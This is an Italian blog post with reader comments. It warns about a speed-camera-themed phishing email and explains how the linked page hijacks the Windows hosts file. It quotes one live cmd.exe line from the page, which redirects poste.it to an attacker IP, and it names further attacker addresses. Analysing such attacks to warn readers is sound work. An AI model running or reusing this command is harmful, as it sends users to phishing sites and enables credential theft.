Mario mi invia un messaggio di phishing proprio "simpatico" che gli è arrivato (e che gmail fortunatamente mette nello spam).

Il messaggio ha come titolo Autovelox e Tutor: dove sono?, il sedicente mittente è info@auto.it, la provenienza sembra essere dall'IP 192.168.74.6, e racconta di come la polstrada abbia messo un sito dove sono indicate le postazioni degli autovelox (vero). Cosa succede però se si apre il link, che - come forse avete immaginato - NON è al sito della Polizia Stradale?

Il codice HTML di quella pagina contiene tra l'altro queste righe:

<param name='first' value='cmd.exe /c echo 210.86.2.150 poste.it >>
%windir%\System32\drivers\etc\hosts & echo 210.86.2.150 www.poste.it
>> %windir%\System32\drivers\etc\hosts' >

Detto in termini meno criptici: se uno ha un PC con Windows, gira con i privilegi di amministratore, e ha un browser non troppo sveglio (Insomma Etilista) allora la pagina web fa in modo che la prossima volta che il malcapitato vuole andare nel sito www.poste.it sarà automaticamente rediretto al sito 210.86.2.150, che a sua volta (in questo momento, ma il bello della cosa è che possono cambiarlo quando vogliono!) punta a ftp://213.123.204.189/bpol/cartepre/index.html; che cosa faccia questo sito, ve lo lascio immaginare.

Come avrete intuito, la cosa pericolosa è che il phishing vero e proprio arriva in un secondo momento, e quindi l'ignaro utente non si accorge di nulla. Sapevàtelo!

| Commenti (5) | TrackBack (0)

0 TrackBacks

Ecco i riferimenti da altri blog: sfruttare la paura dell'autovelox.

URL per il TrackBack di questa notiziola: http://xmau.com/mt5/mt-tb.cgi/4367

5 Commenti

Il quale 210.86.2.150 sembra essere l'IP di utente di un ISP neozelandese. Magari dare un avviso agli admin di Xtra NZ potrebbe salvare qualche ignaro navigante.
Ingegnoso pero' il trucco!

Funziona se e solo se l'utente che esegue ha i privilegi di amministratore E una versione di Explorer vecchia. Quelle più recenti ti chiedono "ma vuoi veramente fare questo?".

E' molto crudo come metodo. Quelli più ingegnosi sono i trojan mollati come drop all'interno di un PDF taroccato ad hoc. PDF assolotumante validi, presi da sorgenti genuine, mandati via mail da sorgenti apparentemente genuine ma con dei bei regailini dentro...

@mestesso: il malware via PDF sta crescendo esponenzialmente, lo so; però alla fine non è ancora così usato dagli utenti casuali, mentre il web sì.

Con Vista/Seven cosa succede? Speravo che con la nuova gestione della sicurezza diminuisse un po' il malware.. certo che se tutti gli utenti disabilitano i controlli o rispondono sì ad ogni "vuoi veramente fare questo?"..

Già perché una volta che la colpa è ben assegnata all'utente il problema di chi vende quel software è risolto :-)

Gli altri miei blog

Se non trovate nulla di nuovo qua, magari è perché stavo scrivendo altrove:
  • sui ritagli di .mau., il tumblr: riciclo di quanto scritto da altri e robettine piccine (flusso continuo). RSS
  • sugli archivi di .mau., il posterous: usato nei momenti più pigri (ultimo post: 5 agosto). RSS
  • sui fumetti di .mau., le strisce che non fanno ridere (ultima vignetta: 5 agosto). RSS
  • su il Post, nel blog di matematica ultralight - spero! (ultimo post: 20 agosto). RSS - RSS commenti
C'è anche il .mau. fan club su Facebook, che però è più che altro un doppione delle notiziole.

Cercami

• Scopri il resto del mio sito (a partire da chi sono)
• Usa il form per inviarmi un messaggio
• Se sei un Commentatore Ufficiale, lòggati

questa notiziola

Questa pagina contiene una singola notiziola di .mau. pubblicata il 05.03.10 11:44.

L'induzione matematica [1/2] era la notiziola precedente nel blog.

De Creto è la notiziola seguente nel blog.

Trova i commenti recenti nell'indice principale o cerca negli archivi globali.